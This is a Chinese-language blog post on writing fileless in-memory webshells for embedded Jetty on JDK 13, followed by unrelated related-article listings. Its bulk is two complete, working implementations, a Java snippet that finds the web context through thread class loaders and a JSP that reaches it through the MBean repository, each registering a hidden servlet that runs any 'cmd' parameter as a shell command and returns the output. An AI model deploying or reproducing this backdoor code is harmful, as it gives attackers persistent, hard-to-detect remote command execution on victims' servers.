高版本jdk下jetty servlet型内存马编写

最新推荐文章于 2026-06-17 10:40:45 发布
原创 最新推荐文章于 2026-06-17 10:40:45 发布 · 2.4k 阅读 · 6 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#servlet #java #jetty #web安全
本文探讨了在SpringBoot + embedded Jetty 9.4.48.v20220622及JDK 13环境下,如何编写Jetty Servlet型内存马。主要介绍了两种方法:1) 通过request获取webappcontext,包括传统方式和通过Thread获取WebAppClassLoader;2) 通过MBean获取webappcontext时遇到的问题及其解决方法。同时提到了参考文献用于深入研究。

测试环境为springboot + embeded jetty jetty-9.4.48.v20220622,jdk为13。

jetty内存马的研究类同于tomcat,获取webappcontext通常有两种方式:

一、通过request获取

传统方式是在有request对象时,通过它获取webappcontext对象

在这里插入图片描述
可以看到得到的对象为webappcontext类中嵌入类context(该类不能在系统初始化完成之后再添加listener、filter和servlet。

还有一种方法是通过Thread类获取thread对象,看能不能找到WebAppClassLoader,从而获取webappcontext对象。

在这里插入图片描述
classloader不为空的都是appclassloader,并没有webappclassloader。但是在非嵌入式jetty中确含有webappclassloaer(有兴趣的小伙伴可以分析一下具体原因)。

在这里插入图片描述
在获取了webappclassloader的基础上很容易就能够写出内存马。

        String servletName = "shell";
        String urlPattern = "/shell";

        Method threadMethod = Class.forName("java.lang.Thread").getDeclaredMethod("getThreads");
        threadMethod.setAccessible(true);
        Thread[] threads = (Thread[]) threadMethod.invoke(null);
        ClassLoader threadClassLoader = null;
        for (Thread thread : threads) {
            threadClassLoader = thread.getContextClassLoader();
            if (threadClassLoader != null) {
                
                if (threadClassLoader.toString().contains("WebAppClassLoader")) {
                    Field fieldContext = threadClassLoader.getClass().getDeclaredField("_context");
                    fieldContext.setAccessible(true);
                    Object webAppContext = fieldContext.get(threadClassLoader);
                    Field fieldServletHandler = webAppContext.getClass().getSuperclass().getDeclaredField("_servletHandler");
                    fieldServletHandler.setAccessible(true);
                    Object servletHandler = fieldServletHandler.get(webAppContext);

                    //check servlet if exist
                    Field fieldServlets = servletHandler.getClass().getDeclaredField("_servlets");
                    fieldServlets.setAccessible(true);
                    Object[] servlets = (Object[]) fieldServlets.get(servletHandler);
                    boolean flag = false;
                    for (Object servlet : servlets) {
                        Field fieldName = servlet.getClass().getSuperclass().getDeclaredField("_name");
                        fieldName.setAccessible(true);
                        String name = (String) fieldName.get(servlet);
                        if (name.equals(servletName)) {
                            flag = true;
                            break;
                        }
                    }

                    if (flag) {
                        return "[-] inject fail, servlet " + servletName + " exists.";
                    }

                    ClassLoader classLoader = servletHandler.getClass().getClassLoader();
                    Class sourceClazz = classLoader.loadClass("org.eclipse.jetty.servlet.Source");

                    Field fieldJavax = sourceClazz.getDeclaredField("JAVAX_API");
                    Method method = servletHandler.getClass().getMethod("newServletHolder", sourceClazz);
                    Object holder = method.invoke(servletHandler, fieldJavax.get(null));
                    holder.getClass().getMethod("setName", String.class).invoke(holder, servletName);
                    Servlet servlet = new Servlet() {
                        @Override
                        public void init(ServletConfig servletConfig) throws ServletException {

                        }

                        @Override
                        public ServletConfig getServletConfig() {
                            return null;
                        }

                        @Override
                        public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
                            String cmd = servletRequest.getParameter("cmd");
                            boolean isLinux = true;
                            String osTyp = System.getProperty("os.name");
                            if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                                isLinux = false;
                            }
                            String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
                            InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                            Scanner s = new Scanner(in).useDelimiter("\\a");
                            String output = s.hasNext() ? s.next() : "";
                            PrintWriter out = servletResponse.getWriter();
                            out.println(output);
                            out.flush();
                            out.close();
                        }

                        @Override
                        public String getServletInfo() {
                            return null;
                        }

                        @Override
                        public void destroy() {

                        }
                    };
                    holder.getClass().getMethod("setServlet", Servlet.class).invoke(holder, servlet);
                    servletHandler.getClass().getMethod("addServlet", holder.getClass()).invoke(servletHandler, holder);

                    Class clazz = classLoader.loadClass("org.eclipse.jetty.servlet.ServletMapping");
                    Object servletMapping = clazz.getDeclaredConstructor(sourceClazz).newInstance(fieldJavax.get(null));
                    servletMapping.getClass().getMethod("setServletName", String.class).invoke(servletMapping, servletName);
                    servletMapping.getClass().getMethod("setPathSpecs", String[].class).invoke(servletMapping, new Object[]{new String[]{urlPattern}});
                    servletHandler.getClass().getMethod("addServletMapping", clazz).invoke(servletHandler, servletMapping);
                    return "[+] inject success, pleas check.";
                }
            }
        }

        return "[-] inject fail, WebAppClassLoader is not in threads.";

二、通过mbean获取

通过mbean获取webappcontext对象时,遇到了一些问题,比如按照参考文档[1]进行测试时,mbean需要去除modifer相关设置,否则会抛出错误。

在这里插入图片描述

修改后详细代码:

<%@ page import="com.sun.jmx.mbeanserver.*"%>
<%@ page import="javax.servlet.*"%>
<%@ page import="java.lang.reflect.*"%>
<%@ page import="java.util.Set,java.util.Scanner,java.io.*"%>
<%@ page import="javax.management.ObjectName"%>
<%@ page import="java.lang.management.ManagementFactory"%>

<%
try{
    String servletName = "myServlet1";
    String urlPattern = "/testservlet";

    JmxMBeanServer mBeanServer = (JmxMBeanServer) ManagementFactory.getPlatformMBeanServer();

    Field field = mBeanServer.getClass().getDeclaredField("mbsInterceptor");
    field.setAccessible(true);
    Object obj = field.get(mBeanServer);

    field = obj.getClass().getDeclaredField("repository");
    field.setAccessible(true);
    Repository repository = (Repository)field.get(obj);

    Set<NamedObject> namedObjectSet = repository.query(new ObjectName("org.eclipse.jetty.webapp:type=webappcontext,*"), null);
    for(NamedObject namedObject : namedObjectSet){
        try{
            field = namedObject.getObject().getClass().getSuperclass().getSuperclass().getDeclaredField("_managed");
            field.setAccessible(true);
            Object webAppContext = field.get(namedObject.getObject());

            field = webAppContext.getClass().getSuperclass().getDeclaredField("_servletHandler");
            field.setAccessible(true);
            Object handler = field.get(webAppContext);

            field = handler.getClass().getDeclaredField("_servlets");
            field.setAccessible(true);
            Object[] objects = (Object[]) field.get(handler);

            boolean flag = false;
            for(Object o : objects){
                field = o.getClass().getSuperclass().getDeclaredField("_name");
                field.setAccessible(true);
                String name = (String)field.get(o);
                if(name.equals(servletName)){
                    flag = true;
                    out.println("[-] exist servlet");
                    return;
                }
            }

            if(!flag){
               out.println("[+] Add Dynamic Servlet");

                ClassLoader classLoader = handler.getClass().getClassLoader();
                Class sourceClazz = null;
                Object holder = null;
                try{
                    sourceClazz = classLoader.loadClass("org.eclipse.jetty.servlet.Source");
                    field = sourceClazz.getDeclaredField("JAVAX_API");
                    Method method = handler.getClass().getMethod("newServletHolder", sourceClazz);
                    holder = method.invoke(handler, field.get(null));
                }catch(ClassNotFoundException e){
                    sourceClazz = classLoader.loadClass("org.eclipse.jetty.servlet.BaseHolder$Source");
                    Method method = handler.getClass().getMethod("newServletHolder", sourceClazz);
                    holder = method.invoke(handler, Enum.valueOf(sourceClazz, "JAVAX_API"));
                }

                holder.getClass().getMethod("setName", String.class).invoke(holder, servletName);

                Servlet servlet = new Servlet() {
                    @Override
                    public void init(ServletConfig servletConfig) throws ServletException {
    
                    }
    
                    @Override
                    public ServletConfig getServletConfig() {
                        return null;
                    }
    
                    @Override
                    public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
                        String cmd = servletRequest.getParameter("cmd");
                        boolean isLinux = true;
                        String osTyp = System.getProperty("os.name");
                        if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                            isLinux = false;
                        }
                        String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
                        InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                        Scanner s = new Scanner(in).useDelimiter("\\a");
                        String output = s.hasNext() ? s.next() : "";
                        PrintWriter out = servletResponse.getWriter();
                        out.println(output);
                        out.flush();
                        out.close();
                    }
    
                    @Override
                    public String getServletInfo() {
                        return null;
                    }
    
                    @Override
                    public void destroy() {
    
                    }
                };

                holder.getClass().getMethod("setServlet", Servlet.class).invoke(holder, servlet);
                handler.getClass().getMethod("addServlet", holder.getClass()).invoke(handler, holder);


                Class clazz = classLoader.loadClass("org.eclipse.jetty.servlet.ServletMapping");
                Object servletMapping = null;
                try{
                    servletMapping = clazz.getDeclaredConstructor(sourceClazz).newInstance(field.get(null));
                }catch(NoSuchMethodException e){
                    servletMapping = clazz.newInstance();
                }

                servletMapping.getClass().getMethod("setServletName", String.class).invoke(servletMapping, servletName);
                servletMapping.getClass().getMethod("setPathSpecs", String[].class).invoke(servletMapping, new Object[]{new String[]{urlPattern}});
                handler.getClass().getMethod("addServletMapping", clazz).invoke(handler, servletMapping);
                return;
            }
        }catch(Exception e){
            out.println(e.toString());
        }
    }
}catch(Exception e){
    out.println(e.toString());
}
%>

如果还需要内嵌哥斯拉内存马,可以参照文档[2]进行修改servlet。

参考

[1] feihong-cs memshell jetty servlet

[2] 解决哥斯拉内存马 pagecontext 的问题

jetty-all-9.4.47.v20220610-uber.jar
02-10
jetty-all-9.4.47.v20220610-uber.jar
jetty-all-9.4.8
01-04
jetty的集合jar包,适合常用开发,省去一个个导入jetty的jar包的烦恼
jetty升级到9.4.48.v20220622后xml中配置的org.eclipse.jetty.server.Request.maxFormContentSize失效
lvkun0223的博客
02-10 1582
jetty升级到9.4.48.v20220622后xml中配置的org.eclipse.jetty.server.Request.maxFormContentSize失效
jetty嵌入式启动websocket
xiaozaq的博客
05-06 1883
网上查了好多资料。试了很多方式都不成功。 记录下成功的方法,我的jetty版本是9.4.9.v20180320: ContextHandlerCollection contexts = new ContextHandlerCollection(); // WebSocket启用 ContextHandler contextHandler = new ContextHandler();...
jetty容器升级版本
ar__ha的博客
12-07 6455
使用jetty作为容器,想要更早的关闭不需要的链接,减少没用的TCP链接数量,方便同时处理更多请求。 在创建Connector的时候调用setMaxIdleTime(15 * 1000);将链接的最大空闲时间从默认的30秒换成15秒。 但是服务器开始出现报错 WARN o.e.j.i.nio:720 - javax.net.ssl.SSLException: illegal change cipher spec msg, conn state = 6, handshake state = 1 WA.
用 Goby 通过反序列化漏洞一键打入内存【利用篇】
m0_46699477的博客
01-16 1383
Goby 使用者无需任何配置,就可以一键打入内存
eclipse升级jetty9
Alex的博客
10-10 2717
找开eclipse软件备注 eclipse原来就是用jetty配合一起开发的,目前想升级 Help-->Install New software 进入以下网址选择一个版本 https://download.eclipse.org/jetty/updates/ 我选了一个版本 https://download.eclipse.org/jetty/updates/jetty-bundles-9.1.x/ 点击Next ...
Godzilla内存生成插件-Godzilla-Suo5MemShell
SuperherRo的博客
09-04 4161
Godzilla 插件: 一键注入 Suo5 内存
servlet容器:jetty,Tomcat,JBoss
qq_41875506的博客
05-05 1124
一.几款servlet容器对比:jetty,Tomcat,JBoss 二.JBOSS相关问题解决 1.JBOSS下载安装 2.处理jboss-as-7.1.1.Final与jdk1.8及1.8以上版本的不兼容问题 3.解决启动JBOSS的standalone.bat时端口占用冲突问题 4.设置外网访问 5. 添加用户 6.在eclipse-jee中配置JBoss 7.在JBoss中配置mysql...
linux jetty内存溢出,jetty的安装,优化
weixin_39875842的博客
05-03 431
1) Jetty : 作用:Jetty 是一个开源的servlet容器,它为基于Javaweb内容,例如JSP和servlet提供运行环境。 特性:易用性,可扩展性,易嵌入性2) Jetty 安装: tar zxf jetty.tar.gz -C /usr/local/jetty/ #解压Java -jar stat.jar #启动jetty export JETTY_HOME=/usr/jav...
jetty的安装和启动
热门推荐
荒野孤鹰
11-30 3万+
Jetty是当下非常流行的一款轻量级Java Web服务器和Servlet容器实现,它由Eclipse基金会托管,完全免费而且开放源代码,因此所有人均可以从其官网下载最新源代码进行研究。由于其轻量、灵活的特性,Jetty被广泛用于一系列知名产品,例如ActiveMQ、Maven、Spark、Google App Engine、Eclipse、Hadoop等等。下面就来研究如何安装和启动jetty
zookeeper3.6.3升级jetty9.4.47解决安全漏洞CVE-2022-2048和CVE-2021-28169
shy_snow的专栏
12-12 1万+
zookeeper3.6安全漏洞CVE-2022-2048和CVE-2021-28169, 替换zookeeper的lib目录下的7个jetty为9.4.47版本jar包后重启zookeeper,即可。jetty9.4.47下载地址https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.47.v20220610/
java内存原理和检测方法
m0_67170526的博客
04-02 2074
内存为现在的主流webshell技术之一, 一般存在于JAVA环境, ASPX环境也有内存,但是PHP没有(有不死,类似条件竞争)内存主要用途是做权限维持,特点是无文件,代码保存在内存中,导致值守人员不太好进行排查。
camel jetty获取HttpServletRequest
zhuzi51的专栏
06-11 1115
楔子 camel jetty 获取 HttpServletRequest demo <routeContext id="sysHttp" xmlns="http://camel.apache.org/schema/spring"> <route> <from uri="jetty:http://0.0.0.0/myapp/1.jpg?sessionSuppo...
jetty各版本与JDK的对应关系
gsls200808的专栏
03-02 1万+
之前被Eclipse官网的JDK对应列表坑过一次,今天又被jetty官网的JDK对应列表坑了一回                               官方的列表地址:http://www.eclipse.org/jetty/about.html官方列表如下VersionsVersionYearHomeJVMProtocolsServletJSPStatus9.32015Eclipse1.8...
升级Eclipse的几个要点
beeworkshop的博客
08-09 266
1. 取消无效更新站点 2. 不试图连接所有的网站下载更新包
解决geoserver跨域问题(tomcat部署)
吾日三省
06-25 1038
jetty-servlets-9.4.48.v20220622和jetty-util-9.4.48.v20220622.jar。PS:只更改第一步的web.xml重启tmocat无效的,访问项目会报404 or 503。通过上传jar包解决的。一、在geoserver的安装目录修改webapps/geoserver/WEB-INF/web.xml。数字为版本号(不用删)。可以看自己能找到什么版本的就上传尝试。1、取消注释,大约在170行和222行。三、重启tomcat。二、上传jar文件。
jetty访问JFinal项目提示403 Forbidden
weixin_38808487的博客
07-13 1554
今天在维护JFinal项目的时候,通过jetty访问项目路径报出如下错误:查阅相关文档资料,了解到jetty在访问不到或没有权限访问访问的url路径下资源时会报出403错误,也就是禁止访问。以下是笔者在JFinal项目中相关路由配置的代码:package config; import Controller.IndexController; import Controller.UserContro...
基于java Web 训练管理系统设计与实现 源码 论文
最新发布
qq_251836457的博客
06-17 1242
用户信息实体,主要包括 用户编号,用户名,密码,姓名,性别,出生日期,证件号,民族,政治面貌,单位,入伍时间,照片,班级,排 等信息实体。1 用户( 用户编号,用户名,密码,姓名,性别,出生日期,证件号,民族,政治面貌,单位,入伍时间,照片,班级,排 )讨论信息实体,主要包括 讨论编号,疑问,说明,发布人,发布时间,状态,回答 等信息实体。系统主要用户实体,班级实体,排实体,科目实体,成绩实体,教学视频实体,教学理论实体,讨论实体,如图所示。班级信息实体,主要包括 班级编号,班级 等信息实体。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值